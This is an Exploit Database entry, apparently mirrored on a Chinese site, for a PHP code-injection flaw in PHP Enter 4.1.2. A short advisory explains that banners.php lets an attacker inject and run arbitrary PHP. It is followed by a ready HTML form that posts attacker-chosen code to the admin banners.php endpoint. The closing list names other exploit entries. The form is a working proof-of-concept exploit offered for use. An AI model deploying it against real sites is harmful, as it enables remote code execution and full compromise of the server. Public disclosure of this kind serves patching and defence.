PHP Enter 4.1.2 – ‘banners.php’ PHP Code Injection

Exploit Database
83 阅读

作者： L3b-r1'z

日期： 2012-05-08
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/37140/

source: https://www.securityfocus.com/bid/53426/info

PHP Enter is prone to a remote PHP code-injection vulnerability.

An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

PHP Enter 4.1.2 is vulnerable; other versions may also be affected. 

<form method="post" action="http://www.example.com/admin/banners.php">
<center>
<font color=#3A586A>Code</font><br />
<textarea name="code">&lt;/textarea&gt;
<br /><br />
<input type="submit" name="submit" VALUE=" Submit"><br /><br /><br /><br/>
</form>

last Exploits
PHP Enter 4.1.2 – ‘banners.php’ PHP Code Injection的更多信息

webessence 1.0.2 – Multiple Vulnerabilities：
TeamCity Agent XML-RPC 10.0 – Remote Code Execution：
Splunk Enterprise 6.4.3 – Server-Side Request Forgery：
PBBoard CMS 2.1.4 – Multiple Vulnerabilities：
ZKTeco ZEM/ZMM 8.88 – Missing Authentication：
ab Web CMS 1.35 – Multiple Vulnerabilities：
meterN v1.2.3 – Remote Code Execution (RCE) (Authenticated)：
Websvn 2.6.0 – Remote Code Execution (Unauthenticated)：